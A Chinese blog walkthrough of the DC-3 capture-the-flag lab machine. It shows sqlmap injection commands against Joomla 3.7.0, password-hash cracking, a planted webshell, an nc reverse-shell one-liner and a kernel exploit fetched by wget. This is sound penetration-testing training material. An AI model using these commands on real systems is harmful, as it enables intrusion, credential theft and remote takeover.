DC-3WP

最新推荐文章于 2024-07-07 06:31:23 发布
最新推荐文章于 2024-07-07 06:31:23 发布
阅读量90 收藏
点赞数
分类专栏: 打靶机 文章标签: php 数据库 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SHJ1395/article/details/127649930
版权

明确目标

找出靶机的最终flag

信息收集

查找出靶机IP地址,利用nmap或者arp -scan -l扫描存活主机

 

漏洞探测

  1. 利用nmap查看靶机相关信息,nmap -A -p- 192.168.221.132 (-A是激进扫描,实战中慎用!-p-是快速扫描全部端口信息)


    发现joomla 内容管理系统(Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统)
  2. 这里发现端口开放,80(http服务)
  3. 尝试访问http服务 

 

漏洞利用

  1. 现在针对这个内容管理系统下手,使用针对于这类cms的扫描工具,发现版本为3.7.0,还有一个管理员页面

  2. 使用漏洞查找工具,查找当前版本的漏洞

    找一下该利用脚本的位置


    利用代码,使用sqlmap
  3. sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
    查询存在那些数据库
  4. 查看一下当前数据库 -current-db 为joomladb
  5. 查询当前数据库下面的表有哪些
    sqlmap -u "http://192.168.221.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
  7. 查询users表下面有哪些字段
    sqlmap -u "http://192.168.221.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

  8. 查询name,password的数据
    sqlmap -u "http://192.168.221.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump  -p list[fullordering]

  9. 发现admin密码为$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu,不知道是什么密文,用john破解一下,把密码文件放在txt文件里面,john xx.txt ,如果想查看破解过的密码可以加上 --show

  10. 用该密码来登录admin后台

    翻看内容找到模板templates
  11. 找到网站默认页面文件index.php插入一句话木马(提前验证代码是否可以被执行)
  12. 用weevely连接

  13. 反弹shell,获取更大的权限,攻击端监听一个端口,nc -lvp 6666
    shell 界面执行 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.221.129 6666 >/tmp/f

  14. 权限不够,提权,查找searchsploit Linux 4.4 Ubuntu 16

  15. 发现拒绝服务漏洞,查找漏洞地址 searchsploit -p 39772.txt


    查看漏洞说明,下载exp文件

    连接不上
  16. 下载过后到靶机执行,无法访问国外网站的话可以其他地方下载到kali,然后使用kali建立一个apache2服务,把下载的zip文件放在var/www/html下面,靶机wget http://192.168.221.129/39772.zip 然后解压执行./

总结

  1. 信息收集很重要,要对渗透的靶机做全面的信息收集,这里就发现了网站使用的cms,从这一突破口下手查找针对该cms的漏洞,熟练使用针对与各类cms的漏洞检测工具joomscan、wpscan等
  2. 学会使用kali searchsploit 去寻找历史漏洞
  3. sqlmap的使用
  4. 使用John去爆破密码
  5. Weevely 的使用 weevely generate 1234 webshell.php 生成木马文件
  6. 反弹shell(通常用于被控端因防火墙受限、权限不足、端口被占用等情形,让被控端主动连接攻击端,把命令行输入输出到攻击端)
  7. 使用工具查找对应系统版本漏洞提权
  8. 要多转变思路!!

SHJ1395
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kernel Pool Exploitation on Windows 7 (BlackHat_DC_2011_Mandt_kernelpool-wp)-计算机科学
04-22
Kernel Pool Exploitation on Windows 7Tarjei Mandtkernelpool@gmail.comAbstract. In Windows 7, Microsoft introduced safe unlinking to ad- dress the growing number of security bulletins affecting the ...
Renesas 两个功率MOSFET的HAT2210WP
01-20
瑞萨科技公司(Renesas)宣布推出具有两个功率MOSFET的HAT2210WP,封装形式是WPAK (瑞萨科技的封装代码)*1高热辐射封装,尺寸仅有5.3 × 6.1 × 0.8 mm (),用于笔记本电脑、通信设备及类似产品的DC-DC变换器中。...
反弹shell_DC-3_wp
CHUNJIUJUN的博客
08-20 662
反弹shell原理与实现 (转自反弹shell原理与实现 - iouwenbo - 博客园 (cnblogs.com)) 什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我
DC-3(失败的wp)
weixin_42238862的博客
02-20 256
中间咸鱼了几天,着实不想学习那几天,就放下电脑去学习了一下python的自动化测试技术。然后那边告一阶段之后继续来这边打靶机写文章了,前期靶机无非是学习各种工具的使用,并且学会有耐心的查找许多资料,前几天不想写就是因为这个靶机打了一个下午没有找到入口点,这几天学习职后发现其实很简单。 还是老样子,确定目标主机的IP 找到目标主机为192.168.11.104,然后nmap开路 扫描之后发现只有80端口是开放的,那当然去看看它的前端页面,然后提示说只有一个入口,让我们尝试去得到flag,就是这里,我当然是
靶机DC-3—WP
m0_66638011的博客
05-17 1200
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
vulnhub-dc3-渗透靶机-wp
yutianovo的博客
08-31 469
靶机描述 DESCRIPTION DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is o
靶机DC-2 WP
m0_66638011的博客
05-13 595
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-2靶场攻破过程:1、我们先进行信息收集,发现了http协议和ssh协议,更改DNS后进入网页,发现了flag1。
靶机DC-1 WP
m0_66638011的博客
05-11 1420
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
靶机DC-4—WP
m0_66638011的博客
06-22 888
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-4靶场攻破过程:1.首先我们进行主机发现,将测试机的网站进行了指纹扫描,发现它没有任何框架。2.然后我们进行bp抓包,发现了暴力破解漏洞。
DC-3靶机
mlws1900的博客
03-23 706
下载不下来的可以用迅雷输入上面的网址进行下载。
Unity3D教程:CDN网络Unity网页插件使用方法2
08-08
<script type="text/javascript" src="http://wp-china.unity3d.com/download_webplayer-3.x/3.0/uo/UnityObject.js"></script> ``` 接着,需要定义一个名为`GetUnity`的函数,这个函数用于获取Unity Player对象,...
PCB技术中的Renesas 两个功率MOSFET的HAT2210WP
12-09
瑞萨科技公司(Renesas)宣布推出具有两个功率MOSFET的HAT2210WP,封装形式是WPAK (瑞萨科技的封装代码)*1高热辐射封装,尺寸仅有5.3 × 6.1 × 0.8 mm (最大),用于笔记本电脑、通信设备及类似产品的DC-DC变换器中。...
dc_wplink
03-22
dc_wplink Discord WP链接机器人 执照 Copyright (C) 2020-2021 Cato Yiu This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as ...
实战某大型连锁企业域渗透
Ms08067安全实验室
07-04 1021
点击星标,即时接收最新推文本文选自《内网安全攻防:红队之路》扫描二维码五折购书实战域渗透测试流程对黑客来说,拿下域控制器是终极目标。然而攻击者空间是如何通过采取信息收集、权限提升、横向移动等一系列手段,从而一步步拿下域控制器的呢?本次将从一张拓扑图开始,和大家一起梳理域的相关知识,并串联内网的各类攻击技术。实验环境概述 下图是一张某公司(虚构名:北京test公司)的网络拓扑示意图。该公司员工...
如何用Java写一个整理Java方法调用关系网络的程序
qq_42349895的博客
07-06 861
最近遇到了一个问题,大致是这样的:如果给你一个 java 方法,如何找到有哪些菜单在使用。我的第一想法是,这不很简单吗?!使用 IDEA 自带的右键 Find Usage 功能,一步一步往上溯源最终找到 Controller 中的方法,找到 requestMapping 的映射路径,然后去数据库一查便知。
php header函数使用无效怎么解决
滴水石穿
07-03 208
如果使用PHP header函数时发生无效的情况,可能有几种可能的原因和解决方法: 1、确保在调用header函数之前没有输出任何内容。header函数必须在任何输出之前调用,包括HTML标记、空格、换行符等。 2、确保没有使用BOM(Byte Order Mark)标记。BOM是一种在UTF-8编码中用于标识文件开头的特殊字符序列,它会导致header函数无效。可以使用文本编辑器将文件另存为UTF-8无BOM格式。 注意:在某些情况下,BOM会导致PHP session无法正常工作,因为session数据
wordpress网站添加一个临时维护功能
最新发布
爱酷码的博客
07-07 262
有时遇到一些情况,比如站点需要闭站备案、或者被要求停站等等,我们就可以使用本文的功能,使我们的 wordpress 站点一键进入站点维护模式:打开站点的任意链接都显示“站点维护中”的字眼,而且返回 503 响应码比整站关闭对搜索引擎更加友好~把以下代码放到functions.php文件中,主要用网站临时维护或者用于备案。事情做好了,把以下代码删除即可!
红日靶场----(二)1.信息收集
zhouA0221的博客
07-04 1241
上期靶场环境已经搭建完成,接下来我们开始渗透测试!主要是学习内网安全、内网横向移动、域渗透。
CVE-2023-30212(xss漏洞)
Battery的博客
07-04 2698
OURPHP版本
2014年电源网年会-沙德尚-高频隔离软开关DC-DC变换器
06-30
"2014年电源网年会上,沙德尚博士分享了关于高频隔离软开关DC-DC变换器的研究成果,主要包括全桥+Boost混合式高效率变换器、输入串联输出并联(ISOP)移相全桥全范围软开关变换器以及三电平移相+LLC混合变换器的探讨...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值